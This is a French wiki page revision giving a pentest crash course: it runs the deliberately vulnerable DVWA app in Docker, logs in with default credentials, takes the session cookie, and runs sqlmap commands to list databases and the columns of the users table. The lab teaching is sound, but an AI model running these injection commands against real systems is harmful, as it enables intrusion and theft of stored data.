Difference between revisions of "Pentest101"
From Tmplab
(Created page with " == Crash course == <code> * Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa * docker run --rm -it -p 80:80 albancrommer/dvwa * browser http:...") |
(No difference)
|
Revision as of 22:32, 24 September 2020
Crash course
- Documentation docker : https://git.interhacker.space/alban/docker-vulnerable-dvwa
- docker run --rm -it -p 80:80 albancrommer/dvwa
- browser http://localhost
- Se logger comme admin:password
- F12 dans chrome/firefox => Récupérer la valeur du cookie de session dans la transaction (ex: PHPSESSID=9r4jeti966r0k54v91pfu58a32)
- sqlmap -u 'http://127.0.0.1/vulnerabilities/sqli/?id=&Submit=Submit' --cookie='security=low;PHPSESSID=$SESSIONCOOKIE; ' -D -p id --dbs
On obtient la liste des bases de données à partir d'une appli faillible en injection SQL... Que faire ensuite ?
sqlmap -u "http://dvwa.lab.local/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=$SESSIONCOOKIE;security=low" -D dvwa -T users --columns